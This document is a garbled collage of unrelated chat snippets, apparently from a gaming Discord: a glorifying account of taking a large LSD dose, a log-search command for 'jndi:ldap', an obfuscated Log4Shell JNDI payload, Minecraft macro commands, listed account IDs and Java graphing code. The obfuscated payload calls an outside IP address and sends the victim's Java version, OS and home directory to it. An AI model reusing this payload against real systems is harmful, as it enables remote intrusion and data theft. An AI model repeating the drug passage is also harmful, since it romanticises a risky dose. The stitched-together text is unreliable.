What's it like? - It's not possible to describe what it's like. Except maybe DEATH.
What did you see? - ALL
What did you do? - My body did nothing, but lay down. I was no more, just ALL
Eating LSD crystal is intense, magical, crazy and the ULTIMATE ACT OF SUBMISSION TO THE PSYCHEDELIC STATE
A thumbprint doesn't open the door of perception it blows it off the hinges. You melt into eternity. You let go and die into the moment which is all. There is no you anymore only all. The intensity of this can't be described, but you realize as you're slipping away that it's familiar.
(edited)find . \( -name '*.gz' -o -name '*.log' \) | xargs -d '\n' zgrep -i "jndi:ldap"
${${date:}Jn${date:}DI:ld${date:}ap${date::}//45${date:.}33${date:.}94${date:.}25:${date:y}${date:/}${java:version},${java:vm},${java:os},${sys:user.home}}
payload now patches the exploit in the current game session (edited).autokey delay 300
.autokey hold 200
.autokey addkey jump tap
.autokey enabled true
.autokey delay 300
.autokey hold 200
.autokey addkey jump tap
.autokey enabled true
gringotts-sky
stuff, as a "shock and awe" campaigngringotts-sky
stuff, as a "shock and awe" campaign Known accounts/alts: fd8774395b134903b213c809a75da89c, 21086aa26efc446a8e1b5a002bc0bdb6
private static int size = 7000;
private static final double[] graph = new double[size];
private static final double[] heights = new double[size];
public static void main(final String[] args) {
final double[] max = {1};
final ImageBuilder imageGraph = new ImageBuilder(graph.length, 2048, "graph");
final AtomicInteger i = new AtomicInteger();
Util.monitorThread(new Util.Monitor() {
@Override
public long getProgress() {
return i.get();
}
@Override
public long getMaxProgress() {
return 128414408;
}
});
FileStuff.readLines("C:\\Users\\IronException\\Downloads\\overworld_250k.csv", lineIn -> {
i.getAndIncrement();
final String[] split = lineIn.split(",");
final int x = Integer.parseInt(split[0]);
final int z = Integer.parseInt(split[1]); // could trow exception...
final int mult = Integer.parseInt(split[2]);
for (int j = 0; j < graph.length; j++) {
graph[j] += mult * RespawnData.getIncrease(j, Math.abs(x) / 2.0 - 1000);
graph[j] += mult * RespawnData.getIncrease(j, Math.abs(z) / 2.0 - 1000);
if (graph[j] > max[0]) {
max[0] = graph[j];
}
final double turningPoint = 2047 * graph[j] / max[0];
final double last = //2047 *
heights[j]
// / max[0]
;
if (turningPoint < last) {
for (int k = (int) turningPoint; k <= last; k++) {
imageGraph.setPixel(j, imageGraph.getHeight() - k - 1, Color.GRAY);
}
} else {
for (int k = (int) last; k <= turningPoint; k++) {
imageGraph.setPixel(j, imageGraph.getHeight() - k - 1, Color.BLACK);
}
}
heights[j] = turningPoint;
}
});
for (int j = 0; j < graph.length; j++) {
final double turningPoint = 2047 * graph[j] / max[0];
for (int k = 0; k < imageGraph.getHeight(); k++) {
imageGraph.setPixel(j, imageGraph.getHeight() - k - 1, k < turningPoint ? Color.BLACK : Color.WHITE);
}
}
imageGraph.saveAndOpenFolder("results/images/CoordsDistribution.png");
}
You don't anthropomorphize your lawnmower, the lawnmower just mows the lawn, you stick your hand in there and it'll chop it off, the end. You don't think 'oh, the lawnmower hates me' -- lawnmower doesn't give a shit about you, lawnmower can't hate you. Don't anthropomorphize the lawnmower.